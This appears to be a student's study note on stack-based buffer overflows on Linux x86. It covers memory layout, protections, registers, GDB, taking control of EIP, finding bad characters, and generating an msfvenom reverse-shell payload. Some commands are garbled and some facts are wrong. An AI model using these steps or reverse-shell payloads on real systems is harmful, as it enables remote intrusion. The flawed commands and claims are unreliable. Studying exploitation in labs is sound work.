Stack-Based Buffer Overflows on Linux x86.md
1 --- 2 abbr: 3 - "IoT: Internet of Things" 4 - "DEP: Data Execution Prevention" 5 - "ASLR: Address Space Layout Randomization" 6 - "ROP: Return Oriented Programming" 7 - " GDB: GNU Debugger" 8 - "FP: Frame Pointer" 9 - "SP: Stack Pointer" 10 - "EIP: Extended Instruction Pointer" 11 - "EBP: Extended Base Pointer" 12 - "NOPS: No Operation Instruction" 13 - 14 --- 15 ## Introduction 16 17 Buffer overflow is not so common now but it is still widely use in embedded device and IoT 18 19 Buffer overflows also could occur in web applications. [Read more here](https://www.bleepingcomputer.com/news/security/you-can-bypass-authentication-on-hpe-ilo4-servers-with-29-a-characters/) 20 21 If too much data is written to a reserved memory buffer or stack that is not limited, specific registers will be overwritten and that could allow code to be executed. 22 23 Buffer overflow could: 24 - Cause a program to crash 25 - Corrupt data 26 - Harm data structures in the program runtime 27 - Overwrite specific program's return address with the vulnerable process's privileges 28 29 Most modern programming language are not vulnerable to buffer overflow because it has [garbage collection](https://www.perplexity.ai/search/is-rust-also-vulnerable-to-buf-nk.nKBmiQHKGBdUieS7DAw#2) 30 31 **Return address** are stored in memory, it points to other memory addresses. If this is overwritten, you can have the return address point to another function/subroutine 32 33 ![[Pasted image 20250407132053.png]] 34 35 **.text** 36 Stores the actual assembler instructions for the program. This area is read-only. Attempt to write to it will cause a segmentation fault 37 38 **.data** 39 Stores global and static variable explicitly initialised by the program 40 41 **Heap** 42 Heap memory stored here. Starts after **.bss** section and will go to the higher memory address 43 44 **Stack** 45 *Last-In-First-Out*. Where local variables are stored in [[C]]/[[C++]]. Defined area inside [[RAM]]. Contents are accessed via the *stack pointer*. 46 47 ### Modern memory protections 48 49 Modern memory protections [[DEP]]/[[ASLR]] would prevent damage caused by buffer overflow. 50 51 [[Canary]] would allow the [[Operating System|os]] to detect for buffer overflows 52 53 #### DEP 54 55 [[DEP]] would mark regions of memory as "Read-Only". 56 57 This read-only memory is where some user-input is stored(Stack) 58 59 The idea of [[DEP]] is to prevent user from uploading shell code into memory and setting the instruction pointer to the shellcode 60 61 To get around this, instead of writing it to stack, hackers write into an executable space(like .text) and use existing call to call them. This is called ROP 62 63 #### ASLR 64 65 With ROP, attacker will need to know where in memory things are stored in, [[ASLR]] was used to implement against it 66 67 A way to get around [[ASLR]] was to leak memory addresses but it is not something easy to be done 68 69 ### Vulnerable Program 70 71 `strcpy()` is vulnerable to buffer overflow because it does not check the size of the destination and will keep on writing till the source is terminated. [Read more](https://www.perplexity.ai/search/why-is-strcpy-vulnerable-to-bu-h6ANjBEUR5qEK4UeKWq8Wg#0) 72 73 To compile a vulnerable [[C]] program, you need to disable [[ASLR]] 74 `echo 0 ) /proc/sys/kernel/randomize_va_space` 75 76 To compile a [[C]] program with [[DEP]] disabled, 77 `gcc input.c -o output -fno-stack-protector -z execstack -m32` 78 79 There are more vulnerable [[C]] functions: 80 - `gets` 81 - `sprintf` 82 - `scanf` 83 - `strcat` 84 85 ### GDB Introductions 86 87 [[GDB]] provides us with breakpoints or stack trace output and allows us to intervene in the execution of programs 88 89 [[GDB]] can be used to view the created binary on the assembly level 90 91 To set the default flavor (Intel or AT&T) use 92 `echo 'set disassembly-flavor (flavor) ) ~./.gbdinit` 93 94 Below is the format of the output from using the command `disassemble main` in [[GDB]] 95 96 | Memory Address(br) | Address Jumps | Assembler Instruction | Operation Suffixes | 97 | ------------------ | ------------- | --------------------- | ------------------ | 98 99 ### CPU Registers 100 101 [[CPU]] registers can be split into: 102 - General registers 103 - Control registers 104 - Segment registers 105 106 Data registers can be split into Data registers, Pointer registers and Index registers 107 108 #### Data registers 109 110 | **32-bit Register** | **64-bit Register** | **Description** | 111 | ------------------- | ------------------- | ----------------------------------------------------------------------------------------------------------- | 112 | `EAX` | `RAX` | Accumulator is used in input/output and for arithmetic operations | 113 | `EBX` | `RBX` | Base is used in indexed addressing | 114 | `ECX` | `RCX` | Counter is used to rotate instructions and count loops | 115 | `EDX` | `RDX` | Data is used for I/O and in arithmetic operations for multiply and divide operations involving large values | 116 117 #### Pointer registers 118 119 | **32-bit Register** | **64-bit Register** | **Description** | 120 | ------------------- | ------------------- | ----------------------------------------------------------------------------------------------------------- | 121 | `EIP` | `RIP` | Instruction Pointer stores the offset address of the next instruction to be executed | 122 | `ESP` | `RSP` | Stack Pointer points to the top of the stack | 123 | `EBP` | `RBP` | Base Pointer is also known as `Stack Base Pointer` or `Frame Pointer` thats points to the base of the stack | 124 #### Index registers 125 126 | **Register 32-bit** | **Register 64-bit** | **Description** | 127 | ------------------- | ------------------- | ----------------------------------------------------------------------- | 128 | `ESI` | `RSI` | Source Index is used as a pointer from a source for string operations | 129 | `EDI` | `RDI` | Destination is used as a pointer to a destination for string operations | 130 131 132 ![[Pasted image 20250408130412.png]] 133 134 135 The FP points at the base of the stack, where the return value would end and it does not move. 136 137 To get the args that is going to be used by addMe, we can add FP by 4 to get the return value and by 8 to get the first args and by 12 to get the second. 138 139 **Keep in mind that the stack moves from high memory to low memory** 140 141 [Read more about the Stack](https://0xinfection.github.io/reversing/pages/part-15-stack.html) 142 143 ## Take Control of EIP 144 145 ```bash 146 gdb -q bow32 147 148 (gdb) run $(python -c "print('\x55'*1200)") 149 ``` 150 151 This will overwrite the **EIP** and **EBP** as can be seen with the command: 152 `(gdb) info registers` 153 154 This process can be imagined visually 155 ![[Pasted image 20250408135346.png]] 156 157 Since `strcpy()` does not check for the size of the source to the destination, it is vulnerable to buffer overflow 158 159 We will be needing an exact number of input up to the EIP so that the following 4 bytes can be overwritten with our desired memory address 160 161 To determine the offset, we use [[Metasploit]] exploit to create a pattern that would help us determine the number of bytes till we can write to the EIP 162 `/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l (length) ) pattern.txt` 163 164 Once we use the generated string as input in [[GDB]], we take the value of EIP and run it in [[Metasploit]] again 165 `/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q (memory of EIP)` 166 167 ### Determine the Length for Shellcode 168 169 Once we know the number of bytes needed to be able to write into EIP, we will be able to overwrite it with the address pointing to our shellcode's beginning 170 171 ```bash 172 (gdb) run $(python -c "print('Aa0Aa1...')") 173 (gdb) info registers eip 174 ``` 175 176 Find out how big our shellcode will be using [[Metasploit|msfvenom]] 177 `msfvenom -p linux/x86/shell_reverse_tcp LHOST=127.0.0.1 lport=31337 --platform linux --arch x86 --format c` 178 179 It is good practise to insert some NOPS before our shellcode 180 181 To determine the length for the shellcode, we need: 182 1. A total of (number) bytes to get to the EIP 183 2. About 100 additional NOPS to before our shellcode 184 3. A total of (number) bytes for shellcode 185 186 Below is a breakdown for the size allocation 187 - Buffer = "\x55" * (bytes needed to reach EIP - NOPs - shellcode - EIP) 188 - NOPS = "\x90" * 100 189 - Shellcode = "\x44" * 150 190 - EIP = "\x66" * 4 191 192 ![[Pasted image 20250408164315.png]] 193 194 ### Bad Character Identification 195 196 Files in [[UNIX]]-like operating system have two bytes containing a **magic number** that determines the file type 197 198 Such reserved characters also exists in application, known as **bad characters**. 199 200 These **bad character** can vary and we will see characters like these: 201 - `\x00` - Null Byte 202 - `\x0A` - Line Feed 203 - `\x0D` - Carriage Return 204 - `\xFF` - Form Feed 205 206 There are **256 character** list that can be checked with to know which characters will cause the program to crash 207 208 Use this formula from the previous section but replace the NOPS and Shellcode with CHARS 209 - Buffer = "\x55" * (bytes needed to reach EIP - total no of char(256) - EIP) 210 - CHARS = "\x00\x01.....\xFF" 211 - EIP = "\x66" * 4 212 213 We can't just execute the main function because it will crash without giving us the possibility to follow what happens in memory. 214 215 To overcome this, we will set a breakpoint for the vulnerable function 216 `break (funcname)` 217 218 Once we have put a breakpoint at the function we want, we run it with out chars 219 220 Then we can look at the stack 221 `(gdb) x/2000xb $esp+500` 222 223 Go through all the chars and take note which character is not there and remove it from the charlist and update the count of the Buffer 224 225 ### Generating Shellcode 226 227 To generate shellcode with [[Metasploit|msfvenom]], we can run 228 `msfvenom -p linux/x86/shell_reverse_tcp lhost=(lhost) lport=(lport) --format c --arch x86 --platform linux --bad-char "bad-chars" --out (filename)` 229 230 Below is a breakdown for the size allocation 231 - Buffer = "\x55" * (bytes needed to reach EIP - NOPs - shellcode - EIP) 232 - NOPS = "\x90" * 100 233 - Shellcode = "\x44....." 234 - EIP = "\x66" * 4 235 236 Since we still have control over the EIP, we can tell it to jump to a memory address of our NOPS sled 237 238 **Make sure to know the system uses little-endian or big-endian**